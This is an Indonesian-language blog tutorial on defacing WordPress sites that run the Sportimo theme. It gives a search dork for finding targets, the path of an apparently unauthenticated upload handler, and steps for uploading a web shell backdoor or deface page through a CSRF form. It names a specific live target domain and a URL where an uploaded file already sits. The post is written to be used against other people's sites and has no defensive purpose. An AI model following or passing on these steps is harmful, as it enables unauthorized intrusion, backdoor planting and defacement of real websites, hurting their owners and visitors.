Deface Wordpress Themes Sportimo File Upload

Hallo semuanya kali ini saya akan share Tutorial Deface Wordpress Themes Sportimo

Oke langsung weh..

Bahan - Bahan
- Dork : inurl:/wp-content/themes/sportimo-theme
- Exploit : /wp-content/themes/sportimo-theme/functions/upload-handler.php
- CSRF : Disini *save dengan extensi .html
- Shell Backdoor / Script Deface

Pertama - tama kalian dorking site nya terlebih dahulu menggunakan dork di atas, tapi disini saya mempunyai live target
Live Target : http://ichd.ma/
Selanjutnya masukkan exploit nya
http://ichd.ma/wp-content/themes/sportimo-theme/functions/upload-handler.php
Jika muncul tulisan error itu tandanya vuln.
Selanjutnya kita masukkan sitenya ke CSRF.
Buka CSRF nya di browser anda, lalu pilih Shell Backdoor/Script Deface kalian.
Klik upload, jika sukses maka akan muncul nama file yang kalian upload
Contoh :
Tinggal kita akses file nya di
site.com/wp-content/uploads/tahun/bulan/filekalian
Contoh : http://ichd.ma/wp-content/uploads/2019/06/dot.html

Oke mungkin cukup sekian tutorial kali ini
Terima Kasih



0 Response to " Deface Wordpress Themes Sportimo File Upload"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel